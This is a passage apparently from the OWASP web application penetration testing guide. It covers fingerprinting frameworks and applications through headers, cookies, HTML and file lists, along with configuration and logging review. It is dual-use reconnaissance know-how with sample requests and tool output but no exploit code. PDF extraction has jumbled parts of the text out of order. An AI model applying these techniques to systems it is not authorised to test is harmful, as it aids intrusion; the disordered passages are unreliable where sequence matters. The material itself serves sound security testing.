However, although this approach is simple and quick, this methodology doesn’t work in 100% of cases. It is possible to easily disable X-Powered-By header by a proper configuration. There are also several techniques that allow a web site to obfuscate HTTP headers (see an example in #Remediation chapter). So in the same example the tester could either miss the X-Powered-By header or obtain an answer like the following: HTTP/1.1 200 OK Server: nginx/1.0.14 Date: Sat, 07 Sep 2013 08:19:15 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Vary: Accept-Encoding X-Powered-By: Blood, sweat and tears Sometimes there are more HTTP-headers that point at a certain web framework. In the following example, according to the information from HTTP-request, one can see that X-Powered-By header contains PHP version. However, the X-Generator header points out the used framework is actually Swiftlet, which helps a penetration tester to expand his attack vectors. When performing fingerprinting, always carefully inspect every HTTP-header for such leaks. HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Sat, 07 Sep 2013 09:22:52 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.4.16-1~dotdeb.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, postcheck=0, pre-check=0 Pragma: no-cache X-Generator: Swiftlet 42 Web Application Penetration Testing Cookies Another similar and somehow more reliable way to determine the current web framework are framework-specific cookies. Consider the following HTTP-request: GET /cake HTTP /1.1 Host: defcon-moscow.org User-Agent: Mozilla75.0 |Macintosh; Intel Mac OS X 10.7; rv: 22. 0) Gecko/20100101 Firefox/22 . 0 Accept: text/html, application/xhtml + xml, application/xml; q=0.9, */*; q=0 , 8 Accept - Language: ru-ru, ru; q=0.8, en-us; q=0.5 , en; q=0 . 3 Accept - Encoding: gzip, deflate DNT: 1 Cookie: CAKEPHP=rm72kprivgmau5fmjdesbuqi71; Connection: Keep-alive Cache-Control: max-age=0 The cookie CAKEPHP has automatically been set, which gives information about the framework being used. List of common cookies names is presented in chapter #Cookies_2. Limitations are the same - it is possible to change the name of the cookie. For example, for the selected CakePHP framework this could be done by the following configuration (excerpt from core.php): /** * The name of CakePHP’s session cookie. * * Note the guidelines for Session names states: “The session name references * the session id in cookies and URLs. It should contain only alphanumeric * characters.” * @link http://php.net/session_name */ Configure::write(‘Session.cookie’, ‘CAKEPHP’); However, these changes are less likely to be made than changes to the X-Powered-By header, so this approach can be considered as more reliable. HTML source code This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web framework. One of the common markers are HTML comments that directly lead to framework disclosure. More often certain framework-specific paths can be found, i.e. links to framework-specific css and/or js folders. Finally, specific script variables might also point to a certain framework. From the screenshot below one can easily learn the used framework and its version by the mentioned markers. The comment, specific paths and script variables can all help an attacker to quickly determine an instance of ZK framework. More frequently such information is placed between head> tags, in tags or at the end of the page. Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields. Sometimes, web developers do not care much about hiding information about the framework used. It is still possible to stumble upon something like this at the bottom of the page: Common frameworks Cookies Framework Cookie name Zope BITRIX_ CakePHP AMP Laravel django HTML source code General Markers %framework_name% powered by built upon running Specific markers Framework Keyword Adobe ColdFusion Indexhibit ndxz-studio Specific files and folders Specific files and folders are different for each specific framework. It is recommended to install the corresponding framework during penetration tests in order to have better understanding of what infrastructure is presented and what files might be left on the server. However, several good file lists already exist and one good example is FuzzDB wordlists of predictable files/folders (http://code.google.com/p/fuzzdb/). Tools A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools. WhatWeb Website: http://www.morningstarsecurity.com/research/whatweb Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. Language: Ruby Matches for fingerprinting are made with: • Text strings (case sensitive) • Regular expressions • Google Hack Database queries (limited set of keywords) • MD5 hashes • URL recognition • HTML tag patterns 43 Web Application Penetration Testing • Custom ruby code for passive and aggressive operations Wappalyzer Website: http://wappalyzer.com Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to construct a target website immediately after browsing a page. Sample output of a plug-in is presented on a screenshot below. Sample output is presented on a screenshot below: BlindElephant Website: https://community.qualys.com/community/blindelephant This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python Sample output of a successful fingerprint: pentester$ python BlindElephant.py http://my_target drupal Loaded /Library/Python/2.7/site-packages/blindelephant/ dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups. Starting BlindElephant fingerprint for version of drupal at http://my_target Hit http://my_target/CHANGELOG.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 527b085a3717bd691d47713dff74acf4 Hit http://my_target/INSTALL.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4 Hit http://my_target/misc/drupal.js Possible versions based on result: 7.12, 7.13, 7.14 References Whitepapers • Saumil Shah: “An Introduction to HTTP fingerprinting” - http:// www.net-square.com/httprint_paper.html • Anant Shrivastava : “Web Application Finger Printing” - http:// anantshri.info/articles/web_app_finger_printing.html Remediation The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be detected by automatic scans. Below are some specific recommendations by framework marker location and some additional interesting approaches. Hit http://my_target/MAINTAINERS.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca HTTP headers Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used. Here is an interesting article about HTTP-headers obfuscation using Netscaler: http://grahamhosking.blogspot.ru/2013/07/obfuscating-http-header-using-netscaler.html Hit http://my_target/themes/garland/style.css Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14 ... Cookies It is recommended to change cookie names by making changes in the corresponding configuration files. Fingerprinting resulted in: 7.14 HTML source code Manually check the contents of the HTML code and remove everything that explicitly points to the framework. Best Guess: 7.14 General guidelines: • Make sure there are no visual markers disclosing the framework 44 Web Application Penetration Testing • Remove any unnecessary comments (copyrights, bug information, specific framework comments) • Remove META and generator tags • Use the companies own css or js files and do not store those in a framework-specific folders • Do not use default scripts on the page or obfuscate them if they must be used. that is entirely or partly dependent on these well known applications (e.g. Wordpress, phpBB, Mediawiki, etc). Knowing the web application components that are being tested significantly helps in the testing process and will also drastically reduce the effort required during the test. These well known web applications have known HTML headers, cookies, and directory structures that can be enumerated to identify the application. Specific files and folders General guidelines: Test Objectives Identify the web application and version to determine known vulnerabilities and the appropriate exploits to use during testing. • Remove any unnecessary or unused files on the server. This implies text files disclosing information about versions and installation too. • Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such restriction for two common WordPress folders is presented below. RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR] RewriteCond %{REQUEST_URI} /wp-admin/$ RewriteRule $ /http://your_website [R=404,L] However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin (http://wordpress.org/ plugins/stealth-login-page). Additional approaches General guidelines: [1] Checksum management The purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches in checksum management: • Change the location of where those files are placed (i.e. move them to another folder, or rename the existing folder) • Modify the contents - even slight modification results in a completely different hash sum, so adding a single byte in the end of the file should not be a big problem. [2] Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to break the current framework! Fingerprint Web Application (OTG-INFO-009) Summary There is nothing new under the sun, and nearly every web application that one may think of developing has already been developed. With the vast number of free and open source software projects that are actively developed and deployed around the world, it is very likely that an application security test will face a target site How to Test Cookies A relatively reliable way to identify a web application is by the application-specific cookies. Consider the following HTTP-request: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 ‘’’Cookie: wp-settings-time-1=1406093286; time-2=1405988284’’’ DNT: 1 Connection: keep-alive Host: blog.owasp.org wp-settings- The cookie CAKEPHP has automatically been set, which gives information about the framework being used. List of common cookies names is presented in Cpmmon Application Identifiers section. However, it is possible to change the name of the cookie. HTML source code This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web application. One of the common markers are HTML comments that directly lead to application disclosure. More often certain application-specific paths can be found, i.e. links to application-specific css and/or js folders. Finally, specific script variables might also point to a certain application. From the meta tag below, one can easily learn the application used by a website and its version. The comment, specific paths and script variables can all help an attacker to quickly determine an instance of an application. More frequently such information is placed between head> tags, in tags or at the end of the page. Neverthe- 45 Web Application Penetration Testing less, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields. Specific files and folders Apart from information gathered from HTML sources, there is another approach which greatly helps an attacker to determine the application with high accuracy. Every application has its own specific file and folder structure on the server. It has been pointed out that one can see the specific path from the HTML page source but sometimes they are not explicitly presented there and still reside on the server. Specific files and folders are different for each specific application. It is recommended to install the corresponding application during penetration tests in order to have better understanding of what infrastructure is presented and what files might be left on the server. However, several good file lists already exist and one good example is FuzzDB wordlists of predictable files/folders (http://code.google. com/p/fuzzdb/). Common Application Identifiers Cookies phpBB phpbb3_ Wordpress wp-settings 1C-Bitrix BITRIX_ AMPcms AMP Django CMS django DotNetNuke DotNetNukeAnonymous e107 e107 EPiServer EPiTrace, EPiServer Graffiti CMS graffitibot Hotaru CMS hotaru_mobile ImpressCMS ICMSession Indico MAKACSESSION InstantCMS InstantCMS[logdate] ered target with the help of defined list and intruder functionality of Burp Suite. Kentico CMS CMSPreferredCulture MODx SN4[12symb] TYPO3 fe_typo_user We can see that for some WordPress-specific folders (for instance, /wp-includes/, /wp-admin/ and /wp-content/) HTTP-reponses are 403 (Forbidden), 302 (Found, redirection to wp-login. php) and 200 (OK) respectively. This is a good indicator that the target is WordPress-powered. The same way it is possible to dirbust different application plugin folders and their versions. On the screenshot below one can see a typical CHANGELOG file of a Drupal plugin, which provides information on the application being used and discloses a vulnerable plugin version. Dynamicweb Dynamicweb LEPTON lep[some_numeric_value]+sessionid Wix Domain=.wix.com VIVVO VivvoSessionId In order to uncover them a technique known as dirbusting is used. Dirbusting is brute forcing a target with predictable folder and file names and monitoring HTTP-responses to emumerate server contents. This information can be used both for finding default files and attacking them, and for fingerprinting the web application. Dirbusting can be done in several ways, the example below shows a successful dirbusting attack against a WordPress-pow- HTML source code Wordpress phpBB1Mary2Peter3Joe
Error
FW-1 at XXXXXX: Access denied. Example of the security server of Check Point Firewall-1 NG AI “protecting” a web server Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application servers. Detecting these proxies can be done based on the server header. They can also be detected by timing requests that should be cached by the server and comparing the time taken to server the first request with subsequent requests. Another element that can be detected is network load balancers. Typically, these systems will balance a given TCP/IP port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the detection of this architecture element needs to be done by examining multiple requests and comparing results to determine if the requests are going to the same or different web servers. For example, based on the Date header if the server clocks are not synchronized. In some cases, the network load balance process might inject new information in the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems load balancer. Application web servers are usually easy to detect. The request for several resources is handled by the application server itself (not the web server) and the response header will vary significantly (including different or additional values in the answer header). Another way to detect these is to see if the web server tries to set cookies which are indicative of an application web server being used (such as the JSESSIONID provided by some J2EE servers), or to rewrite URLs automatically to do session tracking. Authentication back ends (such as LDAP directories, relational databases, or RADIUS servers) however, are not as easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself. The use of a back end database can be determined simply by navigating an application. If there is highly dynamic content generated “on the fly,” it is probably being extracted from some sort of database by the application itself. Sometimes the way information is requested might give insight to the existence of a database back-end. For example, an online shopping application that uses numeric identifiers (‘id’) when browsing the different articles in the shop. However, when doing a blind application test, knowledge of the underlying database is usually only available when a vulnerability surfaces in the application, such as poor exception handling or susceptibility to SQL injection. References [1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework. [2] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. Testing for configuration management Understanding the deployed configuration of the server hosting the web application is almost as important as the application security testing itself. After all, an application chain is only as strong as its weakest link. Application platforms are wide and varied, but some key platform configuration errors can compromise the application in the same way an unsecured application can compromise the server. Test Network/Infrastructure Configuration (OTG-CONFIG-001) Summary The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can include hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application. It takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server. In order to address these problems, it is of utmost importance to perform an indepth review of configuration and known security issues, after having mapped the entire architecture. Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself. For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the application itself (a vulnerability that has arisen a number of times in both web servers or application servers) could compromise the application, as anonymous users could use the information disclosed in the source code to leverage attacks against the application or its users. The following steps need to be taken to test the configuration management infrastructure: • The different elements that make up the infrastructure need to be determined in order to understand how they interact with a web application and how they affect its security. • All the elements of the infrastructure need to be reviewed in order to make sure that they don’t contain any known vulnerabilities. • A review needs to be made of the administrative tools used to maintain all the different elements. • The authentication systems, need to reviewed in order to assure that they serve the needs of the application and that they cannot be manipulated by external users to leverage access. • A list of defined ports which are required for the application should be maintained and kept under change control. After having mapped the different elements that make up the infrastructure (see Map Network and Application Architecture) it is possible to review the configuration of each element founded and test for any known vulnerabilities. How to Test Known Server Vulnerabilities Vulnerabilities found in the different areas of the application architecture, be it in the web server or in the back end database, can severe- 49 Web Application Penetration Testing ly compromise the application itself. For example, consider a server vulnerability that allows a remote, unauthenticated user to upload files to the web server or even to replace files. This vulnerability could compromise the application, since a rogue user may be able to replace the application itself or introduce code that would affect the back end servers, as its application code would be run just like any other application. Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these cases, vulnerabilities need to be tested from a remote site, typically using an automated tool. However, testing for some vulnerabilities can have unpredictable results on the web server, and testing for others (like those directly involved in denial of service attacks) might not be possible due to the service downtime involved if the test was successful. Some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false positives and false negatives. On one hand, if the web server version has been removed or obscured by the local site administrator the scan tool will not flag the server as vulnerable even if it is. On the other hand, if the vendor providing the software does not update the web server version when vulnerabilities are fixed, the scan tool will flag vulnerabilities that do not exist. The latter case is actually very common as some operating system vendors back port patches of security vulnerabilities to the software they provide in the operating system, but do not do a full upload to the latest software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases, vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed” elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated to elements which are not directly exposed, such as the authentication back ends, the back end database, or reverse proxies in use. Finally, not all software vendors disclose vulnerabilities in a public way, and therefore these weaknesses do not become registered within publicly known vulnerability databases[2]. This information is only disclosed to customers or published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known products. This is why reviewing vulnerabilities is best done when the tester is provided with internal information of the software used, including versions and releases used and patches applied to the software. With this information, the tester can retrieve the information from the vendor itself and analyze what vulnerabilities might be present in the architecture and how they can affect the application itself. When possible, these vulnerabilities can be tested to determine their real effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that might reduce or negate the possibility of successful exploitation. Testers might even determine, through a configuration review, that the vulnerability is not even present, since it affects a software component that is not in use. It is also worthwhile to note that vendors will sometimes silently fix vulnerabilities and make the fixes available with new software releases. Different vendors will have different release cycles that determine the support they might provide for older releases. A tester with detailed information of the software versions used by the architecture can analyse the risk associated to the use of old software releases that might be unsupported in the short term or are already unsupported. This is critical, since if a vulnerability were to surface in an old software version that is no longer supported, the systems personnel might not be directly aware of it. No patches will be ever made available for it and advisories might not list that version as vulnerable as it is no longer supported. Even in the event that they are aware that the vulnerability is present and the system is vulnerable, they will need to do a full upgrade to a new software release, which might introduce significant downtime in the application architecture or might force the application to be re-coded due to incompatibilities with the latest software version. Administrative tools Any web server infrastructure requires the existence of administrative tools to maintain and update the information used by the application. This information includes static content (web pages, graphic files), application source code, user authentication databases, etc. Administrative tools will differ depending on the site, technology, or software used. For example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such as the iPlanet web server) or will be administrated by plain text configuration files (in the Apache case[3]) or use operating-system GUI tools (when using Microsoft’s IIS server or ASP.Net). In most cases the server configuration will be handled using different file maintenance tools used by the web server, which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously, the operating system of the elements that make up the application architecture will also be managed using other tools. Applications may also have administrative interfaces embedded in them that are used to manage the application data itself (users, content, etc.). After having mapped the administrative interfaces used to manage the different parts of the architecture it is important to review them since if an attacker gains access to any of them he can then compromise or damage the application architecture. To do this it is important to: • Determine the mechanisms that control access to these interfaces and their associated susceptibilities. This information may be available online. • Change the default username and password. Some companies choose not to manage all aspects of their web server applications, but may have other parties managing the content delivered by the web application. This external company might either provide only parts of the content (news updates or promotions) or might manage the web server completely (including content and code). It is common to find administrative interfaces available from the Internet in these situations, since using the Internet is cheaper than providing a dedicated line that will connect the external company to the application infrastructure through a management-only interface. In this situation, it is very important to test if the administrative interfaces can be vulnerable to attacks. References [1] WebSEAL, also known as Tivoli Authentication Manager, is a re- 50 Web Application Penetration Testing verse proxy from IBM which is part of the Tivoli framework. [2] Such as Symantec’s Bugtraq, ISS’ X-Force, or NIST’s National Vulnerability Database (NVD). [3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. Test Application Platform Configuration (OTG-CONFIG-002) Summary Proper configuration of the single elements that make up an application architecture is important in order to prevent mistakes that might compromise the security of the whole architecture. Configuration review and testing is a critical task in creating and maintaining an architecture. This is because many different systems will be usually provided with generic configurations that might not be suited to the task they will perform on the specific site they’re installed on. While the typical web and application server installation will contain a lot of functionality (like application examples, documentation, test pages) what is not essential should be removed before deployment to avoid post-install exploitation. How to Test Black Box Testing Sample and known files and directories Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon). CGI scanners include a detailed list of known files and directory samples that are provided by different web or application servers and might be a fast way to determine if these files are present. However, the only way to be really sure is to do a full review of the contents of the web server or application server and determine of whether they are related to the application itself or not. Comment review It is very common, and even recommended, for programmers to include detailed comments on their source code in order to allow for other programmers to better understand why a given decision was taken in coding a given function. Programmers usually add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally. Comment review should be done in order to determine if any information is being leaked through comments. This review can only be thoroughly done through an analysis of the web server static and dynamic content and through file searches. It can be useful to browse the site either in an automatic or guided fashion and store all the content retrieved. This retrieved content can then be searched in order to analyse any HTML comments available in the code. Gray Box Testing Configuration review The web server or application server configuration takes an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes. Obviously, the recommended configuration varies depending on the site policy, and the functionality that should be provided by the server software. In most cases, however, configuration guidelines (either provided by the software vendor or external parties) should be followed to determine if the server has been properly secured. It is impossible to generically say how a server should be configured, however, some common guidelines should be taken into account: • Only enable server modules (ISAPI extensions in the case of IIS) that are needed for the application. This reduces the attack surface since the server is reduced in size and complexity as software modules are disabled. It also prevents vulnerabilities that might appear in the vendor software from affecting the site if they are only present in modules that have been already disabled. • Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages. Specifically make sure that any application errors will not be returned to the end-user and that no code is leaked through these errors since it will help an attacker. It is actually very common to forget this point since developers do need this information in pre-production environments. • Make sure that the server software runs with minimized privileges in the operating system. This prevents an error in the server software from directly compromising the whole system, although an attacker could elevate privileges once running code as the web server. • Make sure the server software properly logs both legitimate access and errors. • Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly. • Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection. config, and administration.config (either Read or Write access). This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly. • Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting Permissions for Shared Configuration). • Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only. • Encrypt sensitive information that should be read by the IIS worker processes only and not by other users on the machine. • Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access. • Use a separate identity to publish applicationHost.config to the share. Do not use this identity for configuring access to the shared configuration on the Web servers. • Use a strong password when exporting the encryption keys for use with shared -configuration. 51 Web Application Penetration Testing • Maintain restricted access to the share containing the shared configuration and encryption keys. If this share is compromised, an attacker will be able to read and write any IIS configuration for your Web servers, redirect traffic from your Web site to malicious sources, and in some cases gain control of all web servers by loading arbitrary code into IIS worker processes. • Consider protecting this share with firewall rules and IPsec policies to allow only the member web servers to connect. Logging Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users. Logs are typically properly generated by web and other server software. It is not common to find applications that properly log their actions to a log and, when they do, the main intention of the application logs is to produce debugging output that could be used by the programmer to analyze a particular error. In both cases (server and application logs) several issues should be tested and analysed based on the log contents: • Do the logs contain sensitive information? • Are the logs stored in a dedicated server? • Can log usage generate a Denial of Service condition? • How are they rotated? Are logs kept for the sufficient time? • How are logs reviewed? Can administrators use these reviews to detect targeted attacks? • How are log backups preserved? • Is the data being logged data validated (min/max length, chars etc) prior to being logged? Sensitive information in logs Some applications might, for example, use GET requests to forward form data which will be seen in the server logs. This means that server logs might contain sensitive information (such as usernames as passwords, or bank account details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers ). Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits: • Debug information • Stack traces • Usernames • System component names • Internal IP addresses • Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals) • Business data Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply. A wider list of sensitive information is: • Application source code • Session identification values • Access tokens • Sensitive personal data and some forms of personally identifiable information (PII) • Authentication passwords • Database connection strings • Encryption keys • Bank account or payment card holder data • Data of a higher security classification than the logging system is allowed to store • Commercially-sensitive information • Information it is illegal to collect in the relevant jurisdiction • Information a user has opted out of collection, or not consented to e.g. use of do not track, or where consent to collect has expired Log location Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a log zapper that is capable of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in attacker’s system-level root kits. Consequently, it is wiser to keep logs in a separate location and not in the web server itself. This also makes it easier to aggregate logs from different sources that refer to the same application (such as those of a web server farm) and it also makes it easier to do log analysis (which can be CPU intensive) without affecting the server itself. Log storage Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write on disk. Typically in UNIX systems logs will be located in /var (although some server installations might reside in /opt or /usr/local) and it is important to make sure that the directories in which logs are stored are in a separate partition. In some cases, and in order to prevent the system logs from being affected, the log directory of the server software itself (such as /var/log/apache in the Apache web server) should be stored in a dedicated partition. This is not to say that logs should be allowed to grow to fill up the file system they reside in. Growth of server logs should be monitored in order to detect this condition since it may be indicative of an attack. Testing this condition is as easy, and as dangerous in production environments, as firing off a sufficient and sustained number of requests to see if these requests are logged and if there is a possibility to fill up the log partition through these requests. In some environments where QUERY_STRING parameters are also logged regardless of whether they are produced through GET or POST requests, big que- 52 Web Application Penetration Testing ries can be simulated that will fill up the logs faster since, typically, a single request will cause only a small amount of data to be logged, such as date and time, source IP address, URI request, and server result. Log rotation Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time. This feature should be tested in order to ensure that: • Logs are kept for the time defined in the security policy, not more and not less. • Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space). • File system permission of rotated log files are the same (or stricter) that those of the log files itself. For example, web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these. Some servers might rotate logs when they reach a given size. If this happens, it must be ensured that an attacker cannot force logs to rotate in order to hide his tracks. Log Access Control Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users. Log review Review of logs can be used for more than extraction of usage statistics of files in the web servers (which is typically what most log-based application will focus on), but also to determine if attacks take place at the web server. In order to analyze web server attacks the error log files of the server need to be analyzed. Review should concentrate on: • 40x (not found) error messages. A large amount of these from the same source might be indicative of a CGI scanner tool being used against the web server • 50x (server error) messages. These can be an indication of an attacker abusing parts of the application which fail unexpectedly. For example, the first phases of a SQL injection attack will produce these error message when the SQL query is not properly constructed and its execution fails on the back end database. Log statistics or analysis should not be generated, nor stored, in the same server that produces the logs. Otherwise, an attacker might, through a web server vulnerability or improper configuration, gain access to them and retrieve similar information as would be disclosed by log files themselves. References [1] Apache • Apache Security, by Ivan Ristic, O’reilly, March 2005. • Apache Security Secrets: Revealed (Again), Mark Cox, November 2003 - http://www.awe.com/mark/apcon2003/ • Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox, October 2002 - http://www.awe.com/mark/apcon2002 • Performance Tuning - http://httpd.apache.org/docs/misc/ perf-tuning.html [2] Lotus Domino • Lotus Security Handbook, William Tworek et al., April 2004, available in the IBM Redbooks collection • Lotus Domino Security, an X-force white-paper, Internet Security Systems, December 2002 • Hackproofing Lotus Domino Web Server, David Litchfield, October 2001, • NGSSoftware Insight Security Research, available at http://www. nextgenss.com [3] Microsoft IIS • IIS 6.0 Security, by Rohyt Belani, Michael Muckin, - http://www. securityfocus.com/print/infocus/1765 • IIS 7.0 Securing Configuration - http://technet.microsoft.com/enus/library/dd163536.aspx • Securing Your Web Server (Patterns and Practices), Microsoft Corporation, January 2004 • IIS Security and Programming Countermeasures, by Jason Coombs • From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis, Microsoft Corporation, June 2001 • Secure Internet Information Services 5 Checklist, by Michael Howard, Microsoft Corporation, June 2000 • “INFO: Using URLScan on IIS” - http://support.microsoft.com/default.aspx?scid=307608 [4] Red Hat’s (formerly Netscape’s) iPlanet • Guide to the Secure Configuration and Administration of iPlanet Web Server, Enterprise Edition 4.1, by James M Hayes, The Network Applications Team of the Systems and Network Attack Center (SNAC), NSA, January 2001 [5] WebSphere • IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter Kovari et al., IBM, December 2002. • IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., IBM, March 2002. [6] General • Logging Cheat Sheet, OWASP • SP 800-92 Guide to Computer Security Log Management, NIST • PCI DSS v2.0 Requirement 10 and PA-DSS v2.0 Requirement 4, PCI Security Standards Council [7] Generic: • CERT Security Improvement Modules: Securing Public Web Servers - http://www.cert.org/security-improvement/ • Apache Security Configuration Document, InterSect Alliance http://www.intersectalliance.com/projects/ApacheConfig/index. html • “How To: Use IISLockdown.exe” - http://msdn.microsoft.com/library/en-us/secmod/html/secmod113.asp Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003) Summary File extensions are commonly used in web servers to easily determine which technologies, languages and plugins must be used to fulfill the web request. While this behavior is consistent with RFCs and Web 53 Web Application Penetration Testing Standards, using standard file extensions provides the penetration tester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on particular technologies. In addition, mis-configuration of web servers could easily reveal confidential information about access credentials. The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served. Extension checking is often used to validate files to be uploaded, which can lead to unexpected results because the content is not what is expected, or because of unexpected OS file name handling. The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. Determining how web servers handle requests corresponding to files having different extensions may help in understanding web server behavior depending on the kind of files that are accessed. For example, it can help to understand which file extensions are returned as text or plain versus those that cause execution on the server side. The latter are indicative of technologies, languages or plugins that are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension 